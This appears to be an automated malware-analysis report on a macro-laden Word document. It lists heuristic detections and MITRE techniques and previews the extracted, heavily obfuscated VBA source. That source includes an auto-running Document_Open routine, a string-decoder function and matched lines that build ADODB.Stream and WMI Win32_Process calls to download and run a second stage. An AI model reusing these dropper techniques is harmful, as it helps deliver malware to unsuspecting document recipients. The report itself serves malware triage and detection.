MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is an Office document containing obfuscated VBA macros. The critical heuristic 'OLE_VBA_HTTP_DROP_EXEC' indicates that the VBA code downloads a file from an HTTP source and saves it to disk, likely to execute a second-stage payload. The 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' heuristic further confirms the presence of an obfuscated auto-executing loader. The Document_Open macro is present, suggesting automatic execution upon opening the document.
Heuristics 10
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
otBMPK = lFYYzY.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
GetObject(IRkNkGaVQ("w00i23n23m80g 5m t 4s63: ")).Get(eXvBiXsMW("W 6i 4n 3 328 _4 P73r2 o97c95e64s37s 0")).Create hFVdI, Null, Null, NTcKCPer -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set CDZUFyT = CreateObject(IRkNkGaVQ("A0 D86O92D2 B63.73S30t17r6 e 3a31m96")) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject(IRkNkGaVQ("w00i23n23m80g 5m t 4s63: ")).Get(eXvBiXsMW("W 6i 4n 3 328 _4 P73r2 o97c95e64s37s 0")).Create hFVdI, Null, Null, NTcKCPer -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
KgrRUs = Replace(eXvBiXsMW(KgrRUs), "ymjYnwDHjZ", Environ(IRkNkGaVQ("A16l l40U06s44e2 r 1s9 P 1r 5o2 f21i 1l 9e52"))) -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 120679 bytes |
SHA-256: ed4e042e0d8f7ae6b0b448fcb5027e31ce3d5e1236962bdde17a4047956d8374 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
503 of 831 identifiers look randomly generated (e.g. 'UCpEJzvFosSLsXXmOGsP'); 40 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
CoYndsNcajfA = Left(698143927, 4)
qwHslJuRI = LTrim(16003172)
tkbyI = Left(4237056300#, 2)
KaQXTWKZpoJb = Right(2057980740928#, 2)
GPEPK = Left(441403243394314#, 2)
DwnpOKVNxQST = Space(19)
WgqfTITOHxn = Left(3842328, 3)
lFeAHsjz = RTrim(19916)
pbCXawm "vjJIrxW", "AVvGSBw", "ageTYJxIA", "yoVnpNzsk", "SOLsCqqoA", "KKVBeiU", "DmZbTJBQbZ"
While PBTMia < 3
While nHYPCR < 3
KMFjiVDKrZ = Space(1)
RTbuBw = StrReverse(865794696084023#)
zHufIggwI = 9 + 90 + 90 + 29 + 4 + 37
nHYPCR = nHYPCR + 3
Wend
GPEPK = Right(55329672, 2)
QhYkIS = Left(713165409378728#, 5)
KaQXTWKZpoJb = 77 - 69 - 15 - 80 - 48
ksEESrvQ = StrReverse(87652)
NMBjfWDGCD = RTrim(4322203920044#)
PBTMia = PBTMia + 1
Wend
tkbyI = StrReverse(73067)
kEbLvCjbr = Right(610839240289256#, 5)
kEbLvCjbr = 18 + 22
zHufIggwI = 90 - 82
LXvRKEfTW = RTrim(87607)
NMBjfWDGCD = 22 - 77 - 87 - 78 - 76
UvMzrbZJsmA = Left(27728284, 4)
For xHNvWx = 0 To 4
While JAchms < 1
BWPjymYu = LTrim(60704)
LEBseY = RTrim(514266)
JAchms = JAchms + 2
Wend
KhiQaip = Space(2)
WgqfTITOHxn = Left(68471053844#, 5)
zGmoD = 11 - 95
Next xHNvWx
CoYndsNcajfA = LTrim(39901599423877#)
End Sub
Attribute VB_Name = "Module1"
Function nrIWgg(vijhNt As Boolean, bIEJQQ As Boolean, DujlGq As Integer, FXNojqo As String, pMKxRH As String) As String
BWPjymYu = 70 + 93 + 10
YpNSadIIwrU = 72 - 34 - 10 - 73 - 94 - 88
zGmoD = 36 + 41 + 9 + 50
BQwPso = Right(4749105434974#, 3)
lFeAHsjz = UCase(6187)
qwHslJuRI = 99 - 97 - 35
BQwPso = Space(15)
sAiYhISSkXX = UCase(98974939668120#)
zGmoD = Space(6)
qwHslJuRI = UCase(476180434)
sAiYhISSkXX = Space(7)
While BaIbcL < 4
GPEPK = UCase(8747253639#)
QhYkIS = UCase(69243843573075#)
YpNSadIIwrU = UCase(424688427026167#)
KhiQaip = Left(2862917, 4)
BaIbcL = BaIbcL + 2
Wend
For QESYMd = 0 To 5
ksEESrvQ = Left(9373926, 3)
KhiQaip = Right(143913707808#, 3)
Rrqksfcb = StrReverse(479044431)
Next QESYMd
bIBcHTLDIwb = RTrim(20479881)
cJyCAeL = StrReverse(802317258392#)
For pGYJLl = 0 To 8
BWPjymYu = UCase(675189624)
sBqPr = 9 - 79
YpNSadIIwrU = Right(38057734051431#, 5)
KhiQaip = Space(1)
YpNSadIIwrU = StrReverse(3754809039#)
Next pGYJLl
nrIWgg = "XEudebBuQdyAteuIIv"
End Function
Sub tnuxCH(fqWTUZ As Double, nwminDD As Boolean, asYRYG As Boolean, YEFPzvv As Double)
cJyCAeL = RTrim(75135)
KMFjiVDKrZ = StrReverse(9379546)
cJyCAeL = RTrim(753887043)
zHufIggwI = Right(98400, 3)
NMBjfWDGCD = 44 - 26 - 56 - 37 - 55 - 44
WgqfTITOHxn = RTrim(86757)
lFeAHsjz = Left(686585, 3)
KhiQaip = Left(11640, 3)
DwnpOKVNxQST = UCase(242799)
UvMzrbZJsmA = UCase(12155693813#)
zGmoD = 100 - 50 - 25 - 60 - 82
sAiYhISSkXX = Left(3458792320#, 5)
BQwPso = LTrim(170762)
End Sub
Sub wbJLRz(PjOdDVG As Integer, YLvtoA As String)
YpNSadIIwrU = 14 + 12 + 43 + 87 + 42
YpNSadIIwrU = Left(36369044086#, 4)
Rrqksfcb = Space(19)
YpNSadIIwrU = Left(77040, 3)
BQwPso = Left(335129501020#, 4)
cJyCAeL = LTrim(8581872779#)
sAiYhISSkXX = 19 - 13 - 31 - 55
KaQXTWKZpoJb = StrReverse(9638315179653#)
ksEESrvQ = UCase(2952169653#)
LEBseY = StrReverse(686299103541#)
KaQXTWKZpoJb = LTrim(5312246291#)
KhiQaip = 83 + 96 + 1 + 34
NMBjfWDGCD = RTrim(2634703)
BQwPso = Space(1)
End Sub
Attribute VB_Name = "Module2"
Sub XrNcuC(kSuyyg As String, HYydwJW As Boolean, EPTdRV As String, HfYdaB As Double)
KhiQaip = StrReverse(24811296)
YpNSadIIwrU = Space(1)
UvMzrbZJsmA = RTrim(163558522703#)
For lJHTht = 0 To 5
lFeAHsjz = RTrim(33789319233173#)
KMFjiVDKrZ = Right(327433604632993#, 3)
WgqfTITOHxn = 93 - 84
qwHslJuRI = LTrim(90103823586#)
Next lJHTht
bIBcHTLDIwb = Right(70043678414#, 3)
RTbuBw = Right(2691132779277#, 5)
sBqPr = StrReverse(55452651659#)
jaYzEsLT = Right(46865, 5)
sAiYhISSkXX = 92 - 32
QhYkIS = 64 + 24
BQwPso = 82 - 21 - 85 - 64
zHufIggwI = Left(976021787, 5)
kEbLvCjbr = 5 - 91 - 74 - 54 - 49
NMBjfWDGCD = Right(1465105874319#, 5)
KaQXTWKZpoJb = UCase(254441617030#)
sBqPr = UCase(124860823894325#)
DwnpOKVNxQST = Left(366675, 4)
End Sub
Sub nagbfz(vazrsHY As Integer, weoTlyg As Double, rzqXzgo As Double, sGxfdb As Integer, qxEsAqb As Double)
Rrqksfcb = RTrim(620778127957#)
YpNSadIIwrU = Right(791877713829477#, 5)
kEbLvCjbr = StrReverse(574218539)
Rrqksfcb = StrReverse(31875724713#)
lqWjUyQs = 18 - 49 - 63 - 96 - 51 - 61
LXvRKEfTW = 60 - 73 - 6 - 25 - 27 - 63
YpNSadIIwrU = UCase(193211946)
bIBcHTLDIwb = RTrim(868321977)
YpNSadIIwrU = 27 - 78 - 46
KMFjiVDKrZ = StrReverse(209299)
Rrqksfcb = Right(970593760, 2)
NMBjfWDGCD = 84 + 73 + 83 + 6
YpNSadIIwrU = 32 + 100 + 39
YpNSadIIwrU = RTrim(2253744428258#)
LEBseY = 4 - 9 - 41 - 71 - 16 - 88
qwHslJuRI = LTrim(32363)
For WawurO = 0 To 5
BQwPso = 61 + 26 + 68
lqWjUyQs = Right(6225438943060#, 4)
Next WawurO
Rrqksfcb = Right(4372904, 2)
sBqPr = LTrim(70510353)
End Sub
Sub StmeGM(TVduFo As Boolean, gJgzFce As Boolean)
cJyCAeL = 81 - 59 - 44 - 10 - 61 - 86
lqWjUyQs = UCase(8969433671930#)
For XSoqZs = 0 To 10
DwnpOKVNxQST = Right(66135, 4)
jaYzEsLT = StrReverse(6426221)
LEBseY = RTrim(1041171338073#)
NMBjfWDGCD = Right(31950123874865#, 5)
Next XSoqZs
BWPjymYu = Right(1529156392305#, 4)
KhiQaip = StrReverse(72072)
BWPjymYu = UCase(407729462278258#)
bIBcHTLDIwb = RTrim(55283)
KhiQaip = Space(14)
sAiYhISSkXX = LTrim(2531186)
Rrqksfcb = Left(46885716646#, 2)
BWPjymYu = UCase(3528378)
KaQXTWKZpoJb = StrReverse(3334779121#)
KMFjiVDKrZ = StrReverse(315722272)
UvMzrbZJsmA = UCase(77787666955886#)
GPEPK = UCase(592725733640#)
End Sub
Attribute VB_Name = "Module3"
Function NghmjG(BDuekoF As Boolean, wigrpv As String, pmXNZW As Boolean, qyPCMGj As Integer) As String
KaQXTWKZpoJb = 29 + 36 + 55
UvMzrbZJsmA = 17 + 54 + 38 + 94 + 41 + 48
RTbuBw = UCase(967145)
For sVWjoo = 0 To 8
bIBcHTLDIwb = Left(146238726178#, 4)
jaYzEsLT = 70 + 54 + 24
DwnpOKVNxQST = RTrim(502133252415#)
sAiYhISSkXX = LTrim(886106)
RTbuBw = 4 - 98 - 77
Next sVWjoo
zHufIggwI = 62 + 3 + 70 + 94 + 92 + 25
ksEESrvQ = UCase(14097)
RTbuBw = StrReverse(51782)
zGmoD = RTrim(641735026018#)
For vQZFUh = 0 To 6
kEbLvCjbr = 68 - 70
BWPjymYu = Left(7824797113#, 4)
DwnpOKVNxQST = 74 + 7 + 74 + 14
QhYkIS = StrReverse(128271032192#)
Next vQZFUh
cJyCAeL = 54 - 95 - 30 - 85 - 88 - 2
KMFjiVDKrZ = 76 + 26
QoJHB = StrReverse(45180430)
YpNSadIIwrU = StrReverse(71850508)
KMFjiVDKrZ = Left(5992599, 3)
tkbyI = 98 - 58 - 80 - 85 - 5
UvMzrbZJsmA = Left(627055291267130#, 3)
zHufIggwI = Left(8569253, 3)
NghmjG = "dOjXsqhZAgHPYPIaQKu"
End Function
Sub UujKnq(mSXEuEJ As Boolean, qgtTeq As Boolean, ncxoyX As Integer)
BQwPso = Right(7362023, 5)
Rrqksfcb = UCase(48698266148#)
KMFjiVDKrZ = Right(549886156, 5)
LEBseY = 92 + 35 + 70 + 59
zGmoD = UCase(9339841884#)
BWPjymYu = Right(343581138535#, 5)
NMBjfWDGCD = Space(20)
Rrqksfcb = RTrim(314343004)
KMFjiVDKrZ = LTrim(480466195455#)
QhYkIS = 40 + 98 + 80 + 86 + 90
For NTXHzK = 0 To 5
For gmnGxy = 0 To 7
KMFjiVDKrZ = LTrim(15688464795858#)
BQwPso = LTrim(3336628)
NMBjfWDGCD = StrReverse(49056523803510#)
Next gmnGxy
KhiQaip = Right(157032471279824#, 2)
DwnpOKVNxQST = Space(19)
sBqPr = Space(16)
LXvRKEfTW = 1 + 28
Next NTXHzK
bIBcHTLDIwb = 20 + 17 + 29 + 42 + 18 + 27
CoYndsNcajfA = StrReverse(96432)
YpNSadIIwrU = Left(8705358, 4)
bIBcHTLDIwb = UCase(836106759043#)
jaYzEsLT = 20 - 61 - 92 - 13 - 0
End Sub
Function ZJIDbp(PEykXHO As String, YqZpuG As Boolean) As String
QhYkIS = 6 - 53 - 8 - 4 - 85
zHufIggwI = UCase(4318239713#)
BQwPso = LTrim(70111650802222#)
KaQXTWKZpoJb = Left(26465267635575#, 2)
zHufIggwI = RTrim(549817087558214#)
Rrqksfcb = Space(10)
ksEESrvQ = 56 - 12 - 48 - 39
sAiYhISSkXX = Space(16)
DwnpOKVNxQST = Left(410603489, 4)
zGmoD = 76 - 53 - 7
For MOpUje = 0 To 5
UvMzrbZJsmA = Space(1)
qwHslJuRI = 23 + 26 + 67 + 4 + 87
NMBjfWDGCD = Space(11)
Next MOpUje
QoJHB = Space(17)
For ExMiTl = 0 To 9
zHufIggwI = UCase(94244)
KaQXTWKZpoJb = Space(1)
YpNSadIIwrU = Right(33256168, 4)
zHufIggwI = Right(8523096, 3)
Next ExMiTl
DwnpOKVNxQST = RTrim(48411032)
sBqPr = UCase(35288)
ksEESrvQ = Space(1)
jaYzEsLT = 65 - 53
BQwPso = 89 - 95 - 95 - 11 - 7 - 97
ZJIDbp = "kFxEwAhYRdNhaoPDPyXt"
End Function
Function rnqnZp(wdgTPrk As String, LAVkBgK As Double, MZjrEX As Boolean, pQwYlYA As String, qxgXOpu As Boolean) As String
UvMzrbZJsmA = Left(7357082, 5)
GPEPK = RTrim(4327041741569#)
BWPjymYu = Left(283195168101247#, 3)
jaYzEsLT = StrReverse(29347)
RTbuBw = StrReverse(792094666241#)
For fCdRmF = 0 To 5
For ZCsTHH = 0 To 8
YpNSadIIwrU = 9 - 27 - 63 - 71 - 60 - 2
BQwPso = 58 - 8 - 71 - 21
tkbyI = RTrim(2968765690#)
zHufIggwI = Right(830354034855070#, 4)
Next ZCsTHH
Rrqksfcb = 39 - 36 - 29
KaQXTWKZpoJb = 35 - 20 - 53 - 3
BQwPso = StrReverse(9971144858#)
QoJHB = LTrim(24062)
cJyCAeL = RTrim(160001603)
Next fCdRmF
For VTqXBb = 0 To 3
For ygJkor = 0 To 9
kEbLvCjbr = Left(978880941020577#, 2)
WgqfTITOHxn = Left(23150, 5)
zGmoD = Space(12)
UvMzrbZJsmA = LTrim(378262)
bIBcHTLDIwb = StrReverse(8800286)
Next ygJkor
tkbyI = Right(998084, 4)
jaYzEsLT = LTrim(7806715644#)
Next VTqXBb
BWPjymYu = Space(16)
QoJHB = 39 + 40 + 49 + 81 + 20
GPEPK = Space(18)
LEBseY = LTrim(810212888632#)
sAiYhISSkXX = Left(4498935, 2)
rnqnZp = "bxYTUYhTUaYQqJNX"
End Function
Attribute VB_Name = "Module4"
Sub xlvDfj(BzuaMos As Boolean, QUXGvy As String, OuKBpNo As Double, lCywaZ As String, qupaIR As String)
NMBjfWDGCD = UCase(816610659806120#)
lqWjUyQs = 80 + 92
cJyCAeL = RTrim(900637479689#)
WgqfTITOHxn = Left(5991560999#, 4)
zGmoD = RTrim(942196712071#)
For SIQlyU = 0 To 5
sBqPr = Right(975640679, 2)
sBqPr = StrReverse(3414450046#)
Rrqksfcb = Left(827194, 2)
DwnpOKVNxQST = RTrim(23686437756#)
Next SIQlyU
DwnpOKVNxQST = LTrim(39602)
bIBcHTLDIwb = Left(306507, 2)
GPEPK = UCase(4563036069382#)
DwnpOKVNxQST = LTrim(18770)
WgqfTITOHxn = RTrim(122222396)
jaYzEsLT = Left(889066, 2)
While sExOVe < 2
KaQXTWKZpoJb = Space(16)
kEbLvCjbr = Space(8)
QoJHB = StrReverse(439028795)
lqWjUyQs = LTrim(7981249)
QhYkIS = UCase(71689)
sExOVe = sExOVe + 3
Wend
qwHslJuRI = UCase(2100418031)
DwnpOKVNxQST = Space(14)
zHufIggwI = 36 + 88 + 47 + 78 + 62
End Sub
Function jOdUHB(sMGqWg As String) As String
qwHslJuRI = RTrim(13252)
WgqfTITOHxn = Right(561217791, 2)
LXvRKEfTW = UCase(49192379155#)
LEBseY = StrReverse(3298412261#)
LXvRKEfTW = Left(936720480, 2)
While LtyNyV < 4
While seQOte < 5
qwHslJuRI = Right(53233495445959#, 3)
YpNSadIIwrU = StrReverse(1797845775)
zHufIggwI = UCase(24225979072948#)
seQOte = seQOte + 2
Wend
zHufIggwI = LTrim(6335795718323#)
UvMzrbZJsmA = UCase(51073745)
cJyCAeL = UCase(89797659483#)
KMFjiVDKrZ = Space(2)
Rrqksfcb = 94 - 77 - 69 - 40 - 68
LtyNyV = LtyNyV + 2
Wend
ksEESrvQ = UCase(57628156164678#)
GPEPK = UCase(641974967269208#)
YpNSadIIwrU = Space(13)
sAiYhISSkXX = UCase(14801760)
While iDrtlu < 5
lFeAHsjz = 81 + 42 + 57 + 14
UvMzrbZJsmA = 75 - 46
RTbuBw = 84 + 93 + 50 + 17 + 30 + 50
KaQXTWKZpoJb = 93 + 79
iDrtlu = iDrtlu + 1
Wend
LEBseY = Space(1)
YpNSadIIwrU = Left(7352171456#, 5)
jOdUHB = "SuDXyEMIxVukjSI"
End Function
Function nUXVdV(NHmQxF As String, zeiTgtB As String, RxsdDRX As String, MaAcCD As Boolean, LTOnLS As Integer) As String
While XsJwbC < 2
GPEPK = LTrim(6162417250#)
lFeAHsjz = 74 - 61 - 67
XsJwbC = XsJwbC + 2
Wend
CoYndsNcajfA = 37 - 8
LEBseY = StrReverse(982330)
YpNSadIIwrU = StrReverse(7460149241860#)
KMFjiVDKrZ = StrReverse(3797826315#)
lqWjUyQs = Right(4631265068330#, 3)
For PqCQRP = 0 To 5
While bcXJNk < 1
KMFjiVDKrZ = 31 - 82 - 13 - 17 - 33 - 6
QhYkIS = 13 + 79 + 31 + 91 + 70 + 81
YpNSadIIwrU = Left(719545, 5)
LXvRKEfTW = Space(13)
bcXJNk = bcXJNk + 1
Wend
DwnpOKVNxQST = 45 - 68 - 37 - 64
KMFjiVDKrZ = 45 + 27 + 3 + 57 + 23 + 100
BQwPso = LTrim(325769120)
zGmoD = StrReverse(5209742)
bIBcHTLDIwb = StrReverse(396643447)
Next PqCQRP
Rrqksfcb = LTrim(10818789)
NMBjfWDGCD = Space(5)
lqWjUyQs = RTrim(8616018299904#)
KaQXTWKZpoJb = Right(6917153004#, 3)
tkbyI = RTrim(402423)
While NZazqB < 2
For aCviqP = 0 To 6
Rrqksfcb = StrReverse(20532739)
ksEESrvQ = RTrim(19311374333724#)
CoYndsNcajfA = RTrim(245024)
QoJHB = LTrim(424859233477#)
Rrqksfcb = Space(5)
Next aCviqP
QoJHB = Right(983559171723#, 3)
DwnpOKVNxQST = RTrim(4458010287577#)
zHufIggwI = RTrim(81608274)
BWPjymYu = Left(50475912, 5)
NZazqB = NZazqB + 1
Wend
QhYkIS = LTrim(703822223279#)
lFeAHsjz = 77 - 27
nUXVdV = "UzxYqwYMjglKgGX"
End Function
Function SmUPRh(BTLnqb As Integer, EdefaUp As String, wEIYLx As String, IANRic As Boolean) As String
kEbLvCjbr = LTrim(24709374168050#)
CoYndsNcajfA = Space(13)
DwnpOKVNxQST = 92 + 76 + 78 + 81
ksEESrvQ = LTrim(732243369672393#)
LEBseY = 26 - 9 - 40 - 46
LEBseY = 40 - 25 - 58 - 64 - 2
ksEESrvQ = Space(4)
While jbzRbm < 5
sBqPr = RTrim(5389894664100#)
BQwPso = Left(51485977689824#, 2)
zGmoD = 40 + 42 + 1
RTbuBw = LTrim(999401)
jbzRbm = jbzRbm + 3
Wend
jaYzEsLT = StrReverse(693765567786351#)
DwnpOKVNxQST = UCase(98607776)
lFeAHsjz = Space(6)
KMFjiVDKrZ = Left(731811354, 5)
lqWjUyQs = 4 - 29 - 79 - 43 - 31 - 8
ksEESrvQ = 86 - 33 - 12
zGmoD = RTrim(95080773453925#)
DwnpOKVNxQST = StrReverse(10336436758#)
SmUPRh = "UfMippUmiiQHFRNGgzp"
End Function
Attribute VB_Name = "Module5"
Function ImqGBW(lYHPee As Integer, WcKkMX As Double, qQgHxG As String, PqtIKZ As String, arOpmu As Boolean) As String
For FTzKRz = 0 To 7
zGmoD = StrReverse(1458987)
qwHslJuRI = RTrim(84741018713#)
sBqPr = Space(3)
DwnpOKVNxQST = Left(30825065054#, 4)
Next FTzKRz
UvMzrbZJsmA = Right(157296017826443#, 5)
KhiQaip = RTrim(272547216283#)
KMFjiVDKrZ = LTrim(85853)
tkbyI = UCase(109301436)
KhiQaip = Left(1324991181701#, 2)
DwnpOKVNxQST = 50 - 24 - 62 - 36
DwnpOKVNxQST = LTrim(54740)
QhYkIS = Left(162757679906#, 4)
lqWjUyQs = RTrim(647843)
jaYzEsLT = UCase(665816805333160#)
KaQXTWKZpoJb = UCase(1084535509)
ksEESrvQ = UCase(4744161849#)
zHufIggwI = 94 - 41 - 98 - 90 - 23
LXvRKEfTW = LTrim(7918995791#)
bIBcHTLDIwb = UCase(5967625)
ImqGBW = "ixMiSVKjdCvJuLJyTG"
End Function
Attribute VB_Name = "Module6"
Function eXvBiXsMW(SlEVaZ As String) As String
sBqPr = Right(593079011, 4)
Dim BAHTRTiF As Integer
sBqPr = Left(4631459970#, 4)
Dim RmSByb(824) As Byte
Dim NlNQXbU As String
BWPjymYu = 30 - 80 - 3 - 11
Dim PogITv() As Byte
jaYzEsLT = Left(263590761, 3)
BAHTRTiF = 0
LEBseY = 12 - 61 - 54 - 24 - 19 - 82
PogITv = StrConv(SlEVaZ, vbFromUnicode)
sAiYhISSkXX = Right(32815883558#, 4)
For AiqQYTKo = 0 To UBound(PogITv) - 1
BWPjymYu = Space(17)
If (AiqQYTKo Mod 3 = 0) Then
jaYzEsLT = StrReverse(646166750)
RmSByb(BAHTRTiF) = PogITv(AiqQYTKo)
RTbuBw = StrReverse(780224119425#)
BAHTRTiF = BAHTRTiF + 1
UvMzrbZJsmA = Right(678380803199#, 4)
End If
Next AiqQYTKo
bIBcHTLDIwb = LTrim(45388485718#)
eXvBiXsMW = StrConv(RmSByb, vbUnicode)
LXvRKEfTW = UCase(3780814)
End Function
Attribute VB_Name = "Module7"
Sub lOvYgV(GeHHQVw As Integer, wNasmj As Integer, aPbmwqE As Integer, pmOGOHy As String)
YpNSadIIwrU = 74 + 75 + 56
For GsyLRX = 0 To 9
BWPjymYu = RTrim(76923)
UvMzrbZJsmA = 47 - 25 - 26
cJyCAeL = Right(8754471, 2)
YpNSadIIwrU = Left(83737, 5)
sBqPr = Right(5310016, 2)
Next GsyLRX
sAiYhISSkXX = UCase(268817326)
RTbuBw = 12 - 49 - 97 - 18 - 95
DwnpOKVNxQST = UCase(61722145929#)
Rrqksfcb = 55 - 74
NMBjfWDGCD = Left(278111381, 4)
For HTQgPJ = 0 To 5
zGmoD = LTrim(6822250)
NMBjfWDGCD = 2 - 65 - 18 - 69 - 68 - 43
UvMzrbZJsmA = RTrim(1316808130)
QoJHB = 40 - 95 - 67
Next HTQgPJ
KhiQaip = StrReverse(895947751413#)
GPEPK = Right(895813235882#, 2)
kEbLvCjbr = UCase(1172849)
sAiYhISSkXX = Space(5)
QhYkIS = RTrim(53325797526300#)
bIBcHTLDIwb = 18 - 42 - 68 - 61 - 6
lFeAHsjz = Left(46279928, 2)
End Sub
Function XRBsBn(SchjIdC As Integer, ORlEJao As Integer, XVIqQIy As Integer) As String
zGmoD = StrReverse(772020061583#)
QoJHB = StrReverse(7235360347023#)
sBqPr = 5 - 31
KMFjiVDKrZ = 68 + 84 + 38 + 22 + 78 + 29
jaYzEsLT = RTrim(4727534591308#)
WgqfTITOHxn = StrReverse(904663713)
YpNSadIIwrU = Left(707052, 4)
qwHslJuRI = LTrim(481325648552393#)
lqWjUyQs = 61 + 74 + 3
While NgToGd < 2
While QOqebc < 4
YpNSadIIwrU = RTrim(696284497)
QoJHB = StrReverse(962308)
jaYzEsLT = LTrim(98614996754#)
UvMzrbZJsmA = 70 - 8 - 56 - 18 - 97
DwnpOKVNxQST = 24 - 30 - 78
QOqebc = QOqebc + 1
Wend
zHufIggwI = LTrim(1932029243)
NMBjfWDGCD = 82 + 31 + 22 + 80 + 53 + 86
NgToGd = NgToGd + 3
Wend
BWPjymYu = 20 - 31 - 49 - 82 - 46
qwHslJuRI = UCase(58114)
CoYndsNcajfA = Right(4232934, 4)
WgqfTITOHxn = Left(130896942896#, 4)
XRBsBn = "JLFFplmCcqEkpyd"
End Function
Attribute VB_Name = "Module8"
Function YgBVdD(LYDcshz As Boolean) As String
CoYndsNcajfA = UCase(376745794)
bIBcHTLDIwb = Space(9)
NMBjfWDGCD = Left(52218041, 4)
GPEPK = Left(964108, 2)
WgqfTITOHxn = UCase(7432170549485#)
zHufIggwI = LTrim(25021626678804#)
tkbyI = Right(43269101301657#, 5)
Rrqksfcb = Space(6)
KaQXTWKZpoJb = Right(4187885, 3)
Rrqksfcb = 51 + 55 + 35 + 26 + 0
Rrqksfcb = Left(65851380075011#, 3)
qwHslJuRI = 50 - 23
UvMzrbZJsmA = 8 + 64
jaYzEsLT = 63 + 78 + 4 + 64 + 98 + 13
BQwPso = LTrim(7648519554#)
YgBVdD = "yAQoIMzZhKRGkDY"
End Function
Attribute VB_Name = "Module9"
Sub laeLBJ(HtSRiI As Boolean, czhfjmc As String, BBFXrx As Boolean, oixLhIp As Double)
cJyCAeL = Space(3)
QoJHB = Right(649778586770#, 2)
cJyCAeL = 13 - 52 - 40 - 47
WgqfTITOHxn = 6 - 20 - 10 - 31
sBqPr = 72 + 58 + 14 + 75 + 42
BQwPso = 49 - 54 - 32 - 80 - 56
LXvRKEfTW = LTrim(98846050)
kEbLvCjbr = LTrim(898622325178#)
QhYkIS = UCase(1853922329)
DwnpOKVNxQST = RTrim(4153447616#)
zGmoD = UCase(973240280416061#)
While uuLuaH < 5
sBqPr = 31 + 99 + 10 + 66 + 25
sBqPr = LTrim(10735846)
LXvRKEfTW = Space(20)
LXvRKEfTW = 65 + 5 + 70
uuLuaH = uuLuaH + 2
Wend
zHufIggwI = RTrim(4409201497#)
YpNSadIIwrU = LTrim(898463256416#)
LEBseY = 64 + 0 + 74
KhiQaip = Right(4039446137#, 4)
KhiQaip = LTrim(1679)
CoYndsNcajfA = Right(661730740, 3)
End Sub
Attribute VB_Name = "Module10"
Function UlikBs(YkSookk As Double, hqyJUAM As String) As String
DwnpOKVNxQST = 12 - 85
cJyCAeL = StrReverse(64091592)
zGmoD = LTrim(777038)
zHufIggwI = Right(9679312438#, 3)
For zkEqrI = 0 To 6
RTbuBw = Space(5)
qwHslJuRI = Left(65727783532402#, 3)
Next zkEqrI
kEbLvCjbr = 98 - 70 - 21 - 2
sAiYhISSkXX = RTrim(163068276582511#)
bIBcHTLDIwb = RTrim(5836951196#)
NMBjfWDGCD = RTrim(677912355141#)
CoYndsNcajfA = StrReverse(604294978264434#)
ksEESrvQ = Space(7)
While SSWvFn < 5
QoJHB = UCase(37610286)
KMFjiVDKrZ = LTrim(9095)
BQwPso = LTrim(106792978)
qwHslJuRI = LTrim(57487662)
SSWvFn = SSWvFn + 1
Wend
WgqfTITOHxn = StrReverse(766082943920918#)
BWPjymYu = LTrim(81945544)
UlikBs = "oLFlDWkEzwCsHeC"
End Function
Attribute VB_Name = "Module11"
Function mKUrwC(kEPIZSB As String) As String
For AraooU = 0 To 10
kEbLvCjbr = UCase(109925272)
YpNSadIIwrU = RTrim(9969771)
zGmoD = 95 + 48 + 4 + 11 + 35
KhiQaip = 1 - 37
Next AraooU
GPEPK = LTrim(8443349898118#)
kEbLvCjbr = LTrim(424150775665494#)
YpNSadIIwrU = RTrim(680458)
